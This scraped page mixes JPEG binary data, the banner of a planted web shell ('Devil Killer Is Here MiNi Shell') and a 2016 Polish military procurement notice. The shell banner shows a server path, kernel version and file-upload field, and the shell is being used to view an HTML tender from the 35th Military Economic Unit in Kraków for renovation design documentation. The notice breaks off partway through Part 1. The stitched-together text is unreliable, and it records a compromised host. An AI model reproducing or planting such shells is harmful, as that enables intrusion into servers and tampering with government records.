JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160225/18867-N-2016.html

<p class="kh_header"><b>Kraków: Wykonanie dokumentacji projektowo-kosztorysowych robót remontowych wybranych obiektów budowlanych zlokalizowanych na terenach kompleksów wojskowych administrowanych przez Jednostkę Wojskową Nr 3811 - rok 2016</b><br>
<b>Numer ogłoszenia: 18867 - 2016; data zamieszczenia: 25.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 35 Wojskowy Oddział Gospodarczy , Rząska, ul. Krakowska 2, 30-901 Kraków, woj. małopolskie, tel. +48 261135116, +48 261133017, faks +48 261135059, +48 261135165.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.35wog.wp.mil.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.35wog.wp.mil.pl/pl/37.html</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: JEDNOSTKA BUDŻETOWA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo-kosztorysowych robót remontowych wybranych obiektów budowlanych zlokalizowanych na terenach kompleksów wojskowych administrowanych przez Jednostkę Wojskową Nr 3811 - rok 2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa wykonania dokumentacji projektowo-kosztorysowych robót remontowych wybranych obiektów budowlanych zlokalizowanych na terenach kompleksów wojskowych administrowanych przez Jednostkę Wojskową 
Nr 3811 - rok 2016
Przedmiot zamówienia Zamawiający podzielił na sześć części:.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 160.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości:

dla części nr 1 w kwocie: 1 000,00 zł
(słownie zł: jeden tysiąc złotych 00/100);

dla części nr 2 w kwocie: 3 000,00 zł 
(słownie zł: trzy tysiące złotych 00/100);

dla części nr 3 w kwocie: 1 500,00 zł 
(słownie zł: jeden tysiąc pięćset złotych 00/100);

dla części nr 4 w kwocie:  900,00 zł 
(słownie zł: dziewięćset złotych 00/100);

dla części nr 5 w kwocie:  2 400,00 zł 
(słownie zł: dwa tysiące czterysta złotych 00/100);

dla części nr 6 w kwocie: 1 500,00 zł 
(słownie zł: jeden tysiąc pięćset złotych 00/100);</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznaczył szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż Wykonawca spełnia warunek udziału w postępowaniu jeśli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:

Dla części nr 1:
co najmniej trzy usługi dotyczące wykonania dokumentacji projektowo-kosztorysowych na roboty budowlane lub remontowe obiektów o kubaturze nie mniejszej niż 500 m3 każda i każda na kwotę nie mniejszą niż 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100)
z podaniem nazwy przedmiotu realizacji zamówienia - usługi, terminu wykonania, podmiotów na rzecz których usługi zostały wykonane lub są wykonywane, kubatury obiektu oraz wartości brutto usługi (załącznik nr 8 do SIWZ).
 

Dla części nr 2:
co najmniej trzy usługi dotyczące wykonania dokumentacji projektowo-kosztorysowych na roboty budowlane lub remontowe obiektów o kubaturze nie mniejszej niż 500 m3 każda i każda na kwotę nie mniejszą niż 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100)
z podaniem nazwy przedmiotu realizacji zamówienia - usługi, terminu wykonania, podmiotów na rzecz których usługi zostały wykonane lub są wykonywane, kubatury obiektu oraz wartości brutto usługi (załącznik nr 8 do SIWZ).

Dla części nr 3:
co najmniej trzy usługi dotyczące wykonania dokumentacji projektowo-kosztorysowych na roboty budowlane lub remontowe obiektów o kubaturze nie mniejszej niż 500 m3 każda i każda na kwotę nie mniejszą niż 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100)
z podaniem nazwy przedmiotu realizacji zamówienia - usługi, terminu wykonania, podmiotów na rzecz których usługi zostały wykonane lub są wykonywane, kubatury obiektu oraz wartości brutto usługi (załącznik nr 8 do SIWZ).

Dla części nr 4:
co najmniej trzy usługi dotyczące wykonania dokumentacji projektowo-kosztorysowych na roboty budowlane lub remontowe obiektów o kubaturze nie mniejszej niż 500 m3 każda i każda na kwotę nie mniejszą niż 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100)
z podaniem nazwy przedmiotu realizacji zamówienia - usługi, terminu wykonania, podmiotów na rzecz których usługi zostały wykonane lub są wykonywane, kubatury obiektu oraz wartości brutto usługi (załącznik nr 8 do SIWZ).

Dla części nr 5:
co najmniej trzy usługi dotyczące wykonania dokumentacji projektowo-kosztorysowych na roboty budowlane lub remontowe obiektów o kubaturze nie mniejszej niż 500 m3 każda i każda na kwotę nie mniejszą niż 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100)
z podaniem nazwy przedmiotu realizacji zamówienia - usługi, terminu wykonania, podmiotów na rzecz których usługi zostały wykonane lub są wykonywane, kubatury obiektu oraz wartości brutto usługi (załącznik nr 8 do SIWZ).

Dla części nr 6:
co najmniej trzy usługi dotyczące wykonania dokumentacji projektowo-kosztorysowych na roboty budowlane lub remontowe obiektów o kubaturze nie mniejszej niż 500 m3 każda i każda na kwotę nie mniejszą niż 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100)
z podaniem nazwy przedmiotu realizacji zamówienia - usługi, terminu wykonania, podmiotów na rzecz których usługi zostały wykonane lub są wykonywane, kubatury obiektu oraz wartości brutto usługi (załącznik nr 8 do SIWZ).

bDo wykazu wykonanych lub wykonywanych usług Wykonawca musi dołączyć dowody (poświadczenia) potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie. W odniesieniu do nadal wykonywanych usług poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert.
W odniesieniu do nadal wykonywanych usług - część zrealizowanej faktycznie usługi musi wypełnić wymogi określone przez Zamawiającego na dzień składania oferty/ wniosku.
Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać ww. poświadczeń to składa oświadczenie zawarte w załączniku nr 9 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznaczył szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>aZamawiający wymaga aby Wykonawca dysponował projektantami posiadającymi uprawnienia budowlane do projektowania bez ograniczeń w branży: 

Dla części nr 1:
konstrukcyjno-budowlanej,
sanitarnej,
elektrycznej.

Dla części nr 2:
architektonicznej,
konstrukcyjno-budowlanej,
sanitarnej,
elektrycznej.

Dla części nr 3:
konstrukcyjno-budowlanej,
sanitarnej,
elektrycznej,

Dla części nr 4:
konstrukcyjno-budowlanej,
sanitarnej,
elektrycznej,

Dla części nr 5:
konstrukcyjno-budowlanej,
sanitarnej,
elektrycznej,

Dla części nr 6:
architektonicznej,
konstrukcyjno-budowlanej,
sanitarnej,
elektrycznej,


Wykonawca w celu potwierdzenia, że jest w stanie zabezpieczyć wykonywanie przedmiotu zamówienia wykaże w załączniku złożonym do oferty (zał. nr 10 do SIWZ) personel posiadający wymagane przez Zamawiającego kwalifikacje;

Dokumentacje projektowo-kosztorysowe mają być wykonane przez osoby posiadające uprawnienia budowlane w danej branży oraz wpisane na listy członków właściwych izb samorządu zawodowego

Wykonawca zobowiązany jest do przedłożenia Zamawiającemu najpóźniej w dniu podpisania umowy oryginałów dokumentów lub kopii poświadczonych za zgodność z oryginałem, stwierdzających nadanie odpowiednich uprawnień i przynależność do izby osób wykonujących zamówienie. Wykonawca może dołączyć do oferty uprawnienia i dokumenty potwierdzające przynależność do izby.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznaczył szczegółowych wymagań w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna, iż Wykonawca spełnia warunek udziału w postępowaniu jeśli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:

Dla części nr 1:
co najmniej trzy usługi dotyczące wykonania dokumentacji projektowo-kosztorysowych na roboty budowlane lub remontowe obiektów o kubaturze nie mniejszej niż 500 m3 każda i każda na kwotę nie mniejszą niż 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100)
z podaniem nazwy przedmiotu realizacji zamówienia - usługi, terminu wykonania, podmiotów na rzecz których usługi zostały wykonane lub są wykonywane, kubatury obiektu oraz wartości brutto usługi (załącznik nr 8 do SIWZ).
 

Dla części nr 2:
co najmniej trzy usługi dotyczące wykonania dokumentacji projektowo-kosztorysowych na roboty budowlane lub remontowe obiektów o kubaturze nie mniejszej niż 500 m3 każda i każda na kwotę nie mniejszą niż 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100)
z podaniem nazwy przedmiotu realizacji zamówienia - usługi, terminu wykonania, podmiotów na rzecz których usługi zostały wykonane lub są wykonywane, kubatury obiektu oraz wartości brutto usługi (załącznik nr 8 do SIWZ).

Dla części nr 3:
co najmniej trzy usługi dotyczące wykonania dokumentacji projektowo-kosztorysowych na roboty budowlane lub remontowe obiektów o kubaturze nie mniejszej niż 500 m3 każda i każda na kwotę nie mniejszą niż 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100)
z podaniem nazwy przedmiotu realizacji zamówienia - usługi, terminu wykonania, podmiotów na rzecz których usługi zostały wykonane lub są wykonywane, kubatury obiektu oraz wartości brutto usługi (załącznik nr 8 do SIWZ).

Dla części nr 4:
co najmniej trzy usługi dotyczące wykonania dokumentacji projektowo-kosztorysowych na roboty budowlane lub remontowe obiektów o kubaturze nie mniejszej niż 500 m3 każda i każda na kwotę nie mniejszą niż 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100)
z podaniem nazwy przedmiotu realizacji zamówienia - usługi, terminu wykonania, podmiotów na rzecz których usługi zostały wykonane lub są wykonywane, kubatury obiektu oraz wartości brutto usługi (załącznik nr 8 do SIWZ).

Dla części nr 5:
co najmniej trzy usługi dotyczące wykonania dokumentacji projektowo-kosztorysowych na roboty budowlane lub remontowe obiektów o kubaturze nie mniejszej niż 500 m3 każda i każda na kwotę nie mniejszą niż 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100)
z podaniem nazwy przedmiotu realizacji zamówienia - usługi, terminu wykonania, podmiotów na rzecz których usługi zostały wykonane lub są wykonywane, kubatury obiektu oraz wartości brutto usługi (załącznik nr 8 do SIWZ).

Dla części nr 6:
co najmniej trzy usługi dotyczące wykonania dokumentacji projektowo-kosztorysowych na roboty budowlane lub remontowe obiektów o kubaturze nie mniejszej niż 500 m3 każda i każda na kwotę nie mniejszą niż 10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100)
z podaniem nazwy przedmiotu realizacji zamówienia - usługi, terminu wykonania, podmiotów na rzecz których usługi zostały wykonane lub są wykonywane, kubatury obiektu oraz wartości brutto usługi (załącznik nr 8 do SIWZ).

bDo wykazu wykonanych lub wykonywanych usług Wykonawca musi dołączyć dowody (poświadczenia) potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie. W odniesieniu do nadal wykonywanych usług poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert.
W odniesieniu do nadal wykonywanych usług - część zrealizowanej faktycznie usługi musi wypełnić wymogi określone przez Zamawiającego na dzień składania oferty/ wniosku.
Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać ww. poświadczeń to składa oświadczenie zawarte w załączniku nr 9 do SIWZ.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin wykonania usługi - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.35wog.wp.mil.pl/pl/37.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 35 Wojskowy Oddział Gospodarczy
ul. Krakowska 2, Rząska
30-901 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2016 godzina 09:00, miejsce: 35 Wojskowy Oddział Gospodarczy
ul. Krakowska 2, Rząska
30-901 Kraków
 Kancelaria jawna, budynek nr 1, pokój nr 120 (piętro I) w godzinach 8.00 - 11:00 i 13.00 - 15.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowych remontu budynku nr 1 na terenie kompleksu wojskowego Niedźwiedź gm. Słomniki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo-kosztorysowych remontu: dachu budynku nr 1 (biurowo-sztabowy), na terenie kompleksu wojskowego Niedźwiedź gm. Słomniki. 

BUDYNEK NR 1 - Niedźwiedź gm. Słomniki:

Parametry techniczne budynku:
przeznaczenie budynku: biurowo-sztabowy
rok budowy: 1957
